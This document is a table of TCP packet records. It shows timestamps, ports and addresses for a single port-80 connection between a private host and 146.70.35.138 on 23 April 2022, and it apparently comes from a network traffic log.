Apr 23, 2022 08:12:21.352358103 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352400064 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352400064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352446079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352448940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352488041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352562904 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352577925 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353316069 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353373051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353411913 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353462934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353466988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353501081 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353517056 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353553057 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353593111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353605986 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353607893 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353663921 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353699923 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353701115 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353748083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353750944 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353852987 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.391968012 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392033100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392081022 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392147064 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392149925 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392163038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392193079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392196894 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392220020 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392251968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392302990 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392306089 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392338037 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392354965 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392385960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392421007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392432928 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392477036 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393404961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393459082 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393479109 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393492937 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393498898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393539906 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393591881 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393611908 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393649101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393696070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393742085 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393760920 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393779993 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393784046 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393817902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393872976 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432259083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432308912 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432337046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432369947 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432403088 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432425976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432461023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432496071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432521105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432539940 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432554960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432591915 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432615995 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432625055 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432650089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432677031 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432684898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432745934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433655977 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433711052 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433742046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433763027 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433789968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433840990 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433856964 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433873892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433921099 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433927059 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433969021 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433995008 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433996916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.434031963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.434039116 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.434084892 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472415924 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472440958 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472454071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472470045 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472482920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472563982 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472615004 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472786903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472805977 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472816944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472862959 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472902060 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472903013 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472915888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472954988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472971916 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473431110 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473449945 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473462105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473478079 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473490000 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473510027 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473530054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473704100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473721981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473733902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473769903 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473771095 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473789930 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473798990 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473803043 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473815918 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473844051 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473989010 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474005938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474019051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474049091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.474066973 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.474081039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474133015 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.512749910 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512794018 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512830019 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512856007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512880087 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512937069 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.512996912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513096094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513139009 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513155937 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513175011 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513200045 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513200998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513227940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513231039 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513273954 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513854027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513892889 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513926983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513951063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513952971 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513984919 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514014006 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514019012 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514053106 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514054060 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514079094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514095068 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514102936 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514113903 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514137983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514153957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514179945 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514192104 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514233112 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514255047 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514259100 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514281988 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514286041 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514329910 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552782059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552823067 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552843094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552849054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552858114 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552877903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552886009 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552918911 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552926064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552941084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552954912 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552967072 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552983999 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553036928 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553097963 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553647041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553673983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553689957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553694963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553709984 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553714991 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553735018 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553957939 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553978920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553999901 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554004908 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554022074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554042101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554054976 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554068089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554116964 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554117918 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554158926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554184914 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554200888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554238081 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554255009 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554295063 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554346085 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554364920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554385900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554402113 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554406881 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554423094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554447889 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554476023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554514885 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.592963934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593023062 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593064070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593091011 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593116999 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593154907 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593172073 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593216896 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593266964 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593314886 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593337059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593352079 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593352079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593370914 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593399048 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593415976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593465090 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593961954 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593986034 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594007969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594023943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594033957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594048023 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594067097 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594072104 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594125032 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594482899 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594508886 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594531059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594535112 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594549894 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594602108 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594623089 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594640970 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594665051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594688892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594690084 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594706059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594718933 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594743967 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594753981 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594767094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594789028 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594789028 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594806910 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594830990 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594865084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594908953 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.632968903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633060932 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633126974 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633155107 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633182049 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633249044 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633275032 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633337021 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633413076 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
